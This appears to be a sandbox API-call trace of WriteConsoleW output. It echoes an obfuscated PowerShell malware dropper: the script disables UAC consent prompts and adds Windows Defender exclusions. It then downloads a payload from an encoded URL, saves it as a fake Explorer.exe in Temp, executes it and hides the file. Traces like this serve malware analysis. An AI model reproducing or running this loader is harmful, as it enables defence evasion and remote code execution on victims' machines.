WriteConsoleW
|
buffer:
The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, script file, or operable program. Check the spelling of the name, or if a pat
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
h was included, verify that the path is correct and try again.
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:1671
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::Write
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
AllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoY
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Ht){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410)
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
)) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith((
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -Exec
console_handle:
0x00000083
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
utionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWit
console_handle:
0x0000008f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
h((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $i
console_handle:
0x0000009b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
DogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilO
console_handle:
0x000000a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
np($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,7
console_handle:
0x000000b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
3402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNa
console_handle:
0x000000bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
RfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkO
console_handle:
0x000000cb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
oGu).value__};function UbnAGDtoWmGRHMWp($sIOnmedZDDmzbaqMY){$piDBrOWjfSpEFsTcUF
console_handle:
0x000000d7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Cq = New-Object (rUZdUobLXAfzKyLERv @(73380,73403,73418,73348,73389,73403,73400
console_handle:
0x000000e3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
,73369,73410,73407,73403,73412,73418));[Net.ServicePointManager]::SecurityProto
console_handle:
0x000000ef
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
col = [Net.SecurityProtocolType]::TLS12;$PCfkdoRHTEkbDRym = $piDBrOWjfSpEFsTcUF
console_handle:
0x000000fb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Cq.DownloadData($sIOnmedZDDmzbaqMY);return $PCfkdoRHTEkbDRym};function rUZdUobL
console_handle:
0x00000107
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
XAfzKyLERv($dJpyOwCQuNvvus){$SdToBurDGMn=73302;$VxLTWGUn=$Null;foreach($VugtEnu
console_handle:
0x00000113
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
in $dJpyOwCQuNvvus){$VxLTWGUn+=[char]($VugtEnu-$SdToBurDGMn)};return $VxLTWGUn
console_handle:
0x0000011f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
};function LFpSWuJMZqJ(){$gDIyZDdKs = $env:Temp + '\';Set-ItemProperty -Path RE
console_handle:
0x0000012b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
GISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\S
console_handle:
0x00000137
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ystem -Name ConsentPromptBehaviorAdmin -Value 0;$DqPtwnqSlxilGJt=$env:Temp; Add
console_handle:
0x00000143
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-MpPreference <<<< -ExclusionPath $DqPtwnqSlxilGJt;Add-MpPreference -Exclusion
console_handle:
0x0000014f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Extension ?lnk?;$bWhkJyOqWMVrLJ = $gDIyZDdKs + 'Explorer.exe'; if (Test-Path -P
console_handle:
0x0000015b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ath $bWhkJyOqWMVrLJ){YCRqlDfp $bWhkJyOqWMVrLJ;}Else{ $hEDDEUJiAbfkEXH = UbnAGDt
console_handle:
0x00000167
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
oWmGRHMWp (rUZdUobLXAfzKyLERv @(73406,73418,73418,73414,73360,73349,73349,73351
console_handle:
0x00000173
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
3416,73348,73403,73422,73403));vVvjPjftuBpios $bWhkJyOqWMVrLJ $hEDDEUJiAbfkEXH;
console_handle:
0x00000197
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
YCRqlDfp $bWhkJyOqWMVrLJ;};yrxXGaHYxljOAHilOnp $bWhkJyOqWMVrLJ;;;;;}LFpSWuJMZqJ
console_handle:
0x000001a3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
; uac
console_handle:
0x000001af
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle:
0x000001bb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
mmandNotFoundException
console_handle:
0x000001c7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x000001d3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle:
0x000001f3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, script file, or operable program. Check the spelling of the name, or if a pat
console_handle:
0x000001ff
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
h was included, verify that the path is correct and try again.
console_handle:
0x0000020b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:1720
console_handle:
0x00000217
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::Write
console_handle:
0x00000223
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
AllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoY
console_handle:
0x0000022f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Ht){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410)
console_handle:
0x0000023b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
)) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith((
console_handle:
0x00000247
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -Exec
console_handle:
0x00000253
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
utionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWit
console_handle:
0x0000025f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
h((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $i
console_handle:
0x0000026b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
DogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilO
console_handle:
0x00000277
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
np($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,7
console_handle:
0x00000283
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
3402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNa
console_handle:
0x0000028f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
RfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkO
console_handle:
0x0000029b
|
1
|
1 |
0
|